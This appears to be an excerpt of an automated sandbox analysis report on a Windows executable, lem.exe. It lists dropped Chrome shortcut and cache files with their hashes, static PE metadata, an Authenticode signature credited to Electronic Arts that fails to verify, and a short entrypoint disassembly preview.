                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....+,.$X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y 0...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9937730951822874
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8fdbTDvVH3idAKZdA1weh/iZUkAQkqehw6y+2:8JXZ9QAy
                                                                                                                                                                                                                                                                                                  MD5:76B625A60AFE9DBAEA2AE7D4237AA9B3
                                                                                                                                                                                                                                                                                                  SHA1:45F186330583ADB10679E1F1C4A87F7837EEFFF4
                                                                                                                                                                                                                                                                                                  SHA-256:A891DC1208A00749A31375BAA17691CBDFB02998544681C5D928BACF265A3191
                                                                                                                                                                                                                                                                                                  SHA-512:F7A5D1E77F0A2D7F131755E7849D4E1916C92A7B2D76994EDEB0E121C151676B3D1D58642E77963BFCA7577410A8827651C492DE816407B5BDD83A8E543964DE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,........$X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y 0...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.005720216456517
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8xIdbTDvsH3idAKZdA14tseh7sFiZUkmgqeh7s66y+BX:8xUXan9y
                                                                                                                                                                                                                                                                                                  MD5:619165E975505AB5F3A1EBBF82022B42
                                                                                                                                                                                                                                                                                                  SHA1:C00B00FD0FA25C9A7BC0B84953E5A8B9BB9361F5
                                                                                                                                                                                                                                                                                                  SHA-256:778294434850506EDCE0120250FC19CD822D61023A6F941FCA1F781915C2E667
                                                                                                                                                                                                                                                                                                  SHA-512:30D2C91B090AC802ABA672A3AB3E7A10BE94471EA7E2B1525B83D8773DC3B42A2EB76D11894ABD0F17E3A7422755886ED216B082AB8DABB5E4DFE0AF777D9A8C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9918110868213175
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:87dbTDvVH3idAKZdA1vehDiZUkwqeh86y+R:8dX6Hy
                                                                                                                                                                                                                                                                                                  MD5:FE5300224368DE208C1918CE96746D54
                                                                                                                                                                                                                                                                                                  SHA1:9ADCC322264B46344AEF2F2314BA3FE68571D81A
                                                                                                                                                                                                                                                                                                  SHA-256:8C373F92C3DA0A12656E0885F685A7027D3B6DCDA5EF353967E6BAFBF9077192
                                                                                                                                                                                                                                                                                                  SHA-512:947A641FA8AA5954062ECD41B4506E456747A33A9D8FAA15F75A448F960A32039ED0D409E830AB1B465DD0817BDB0078B142955E4D4B965F2F7DC0C9D25B09E2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....=M..$X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y 0...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.981231175169598
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8sdbTDvVH3idAKZdA1hehBiZUk1W1qeh+6y+C:8wX69jy
                                                                                                                                                                                                                                                                                                  MD5:B88A19219BEE3ACF5C072C5D1E54C600
                                                                                                                                                                                                                                                                                                  SHA1:DFED3D5A6D7EDDD0218F4C324B91D9A246732B67
                                                                                                                                                                                                                                                                                                  SHA-256:63FCB9FA63086EFF0C4552A99744F59E7A71F3E02A079A32CA4879CCB97AC688
                                                                                                                                                                                                                                                                                                  SHA-512:46379534299C1FFDEB4DD9774D3D1C82E6E64E6837115FD4C4276BC5C8BD22B65F6BD030D62663EC89DB26600FCB2C1A6693CCC3555507BA561B02BDCED122B7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....x..$X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y 0...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 27 05:00:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9905578608402874
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8ddbTDvVH3idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbU6y+yT+:8rXET/TbxWOvTb9y7T
                                                                                                                                                                                                                                                                                                  MD5:1C4F40D15345EB92A8342AC92607BBF9
                                                                                                                                                                                                                                                                                                  SHA1:321E09593709AF09BD6957238DDD37C11F147AD7
                                                                                                                                                                                                                                                                                                  SHA-256:3996A7F7E9033E64F8ADDC2024B5A2865370B801741F2E5486E8E968CA1A2875
                                                                                                                                                                                                                                                                                                  SHA-512:B0E52B263D2102A95846B87413FBE48E38720A9E8EFD8E02B8E95B3C27E951FAEE5451C8B79AF41B22E2DB25B4B2ED2BDFC17E53409F12ACCAEBDAAD2DCDAEC7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....J..$X..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.0....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.0....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.0....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.0..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y 0...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........!..T.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 437

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3239)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):3244
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8651696873407255
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:xm2SliBFd66666rusLRAycFGy4dXvUBffQffo:oFAFd66666rustH4GBdK
                                                                                                                                                                                                                                                                                                  MD5:7ED640BBF262B8590D26FA1B99ACC611
                                                                                                                                                                                                                                                                                                  SHA1:FD2334AD793D168DE847FE8B6E67D466B47A35DC
                                                                                                                                                                                                                                                                                                  SHA-256:AEFFEC86885A6D01E568E3AF7BE3FAE1ED55767CA852E12895C788E207ABDF58
                                                                                                                                                                                                                                                                                                  SHA-512:7EB5209427BD456F8CC1873D86B7C718E288A142C33B88C4F97080D76D0D800D459F463E1319A75F5472160E14009873C161D51C46FF47AEAC3C6CDBD9E2D649
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["episode 12 danmachi season 5","epic games store free games","interest rates mortgages","victor wembanyama","aurora borealis northern lights forecast","universal studios rip ride rockit","nintendo switch 2 console","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWowbjJoejZjEhhGcmVuY2ggYmFza2V0YmFsbCBwbGF5ZXIy2wxkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFiQUFBQ0F3RUJBUUFBQUFBQUFBQUFBQUFGQmdFQ0JBTUhBUC9FQURRUUFBSUJBd0lGQWdFS0J3QUFBQUFBQUFFQ0F3QUVFUVVTQmhNaE1VRlJZYUVIRkJVa

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 438

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 439

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):132755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.436954404704743
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fFkJQ7O4N5dTm+syHEt4W3XdQ4Q6suSr/nUW2i6o:fUQ7HTt/sHdQ4Q6sDfUW8o
                                                                                                                                                                                                                                                                                                  MD5:73E60843ED751AFE939904B2C3A65E34
                                                                                                                                                                                                                                                                                                  SHA1:C78DE8DDAC890D5B558C74A278DC2B1FD9994C93
                                                                                                                                                                                                                                                                                                  SHA-256:F373EAA364D27D61AC1904E40099AA9DC0EB6FC4538B5F23086B468CEA35C270
                                                                                                                                                                                                                                                                                                  SHA-512:7C7C4F6EBD00C455D99EB4B789BA8E6E2DDAFA9F70744658AE9FBEA9283230299C63DC9A62BAD3B3A539BFDC125BC10EB3573F1A538D1B193849AF59DF984845
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.963622315465213
                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                  File name:lem.exe
                                                                                                                                                                                                                                                                                                  File size:1'273'852 bytes
                                                                                                                                                                                                                                                                                                  MD5:5782bea403267e4a6ddf82263332ed59
                                                                                                                                                                                                                                                                                                  SHA1:2c1967ed35f79ce390ee56f30fdfa6d97426c4c9
                                                                                                                                                                                                                                                                                                  SHA256:0f9003739fc0213ff837f03f9c1ce4c835e3aab255c94d388aefb9d9b985cb2d
                                                                                                                                                                                                                                                                                                  SHA512:c52f301175e70162ef230f9bef37c587c1168b8a79048583f65b52a5b35075dfa6569c5c6a0729a2b489d4d92e62b11bb0b0bd3c9dbce22c00cb1327f06ae5e6
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:iSw7GQaYEXaOrP0awJKdb0QmZoEOWlx7uloMwppPETOJ4gD5zWs00:87/cXdsjJ4b0QAjOS7SoMwptK64gDgd0
                                                                                                                                                                                                                                                                                                  TLSH:F645232FD2D984AEE0F34F769674CF2781BDF1441929D10BA0A95ACE3E11B11C29A377
                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                                  Icon Hash:2970d080e071b26b

                                                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                                                  • 04/05/2023 02:00:00 07/05/2026 01:59:59
                                                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                                                  • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                                                  Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                                                                                                                                                                                                                                                                                  Serial:0671352DC4C103B70AE725E954486374

                                                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB41Bh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 0040A264h
                                                                                                                                                                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                  push 0040A24Ch
                                                                                                                                                                                                                                                                                                  push 00476AA0h
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB0FDh
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  call 00007F23B48EB0EBh
